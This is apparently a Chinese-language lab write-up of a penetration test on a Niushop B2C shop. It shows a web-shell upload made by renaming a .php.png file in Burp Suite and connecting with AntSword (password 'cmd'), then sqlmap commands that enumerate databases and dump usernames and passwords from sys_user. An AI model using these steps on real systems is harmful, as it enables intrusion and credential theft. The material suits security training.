1 文件上传漏洞
- 准备一句话文件wjr.php.png,进入到更换头像的界面,使用BP拦截选择文件的请求
- 拦截到请求后将wjr.php.png修改为wjr.php,进行转发
- 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功
- 使用时间戳在线工具获取到上传文件的名称
- 打开中国蚁剑,将上传文件对应的URL输入,并在连接密码处输入cmd,点击添加
- 双击进入后可以查看网站目录
2 SQL注入漏洞
2.1 第一个注入点
- 进入存在注入点的网页
- 输入
id=1 and 1=2
进行测试,如果与之前的显示不一样则存在SQL注入漏洞
2.2 第二个注入点
- 进入存在注入点的网页
- 使用BP拦截刷新界面的操作,获取到请求流量,并保存到wjr.txt中
- 打开SQLmap工具,输入命令搜索是否存在注入点
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch
- 输入命令获取所有的数据库
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch --dbs
- 输入命令获取指定数据库的所有表
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 --tables
- 输入命令获取注定数据库中指定表的所有字段
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user --columns
- 输入命令获取指定数据库中的指定表的指定字段,这里指定的是user_name和user_password,–dump的作用是获取表中的信息
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user -C user_name,user_password --dump
2.3 第三个注入点
- 第三个注入点在搜索中
- 使用BP截获搜索请求,将请求保存在wjr.txt中,并使用sqlmap进行测试
- 获取到数据库信息
2.4 第四个注入点
- 进入存在注入点的网页
- 使用BP拦截修改操作,并将流量保存到wjr.txt中
- 使用SQLmap获取到数据库信息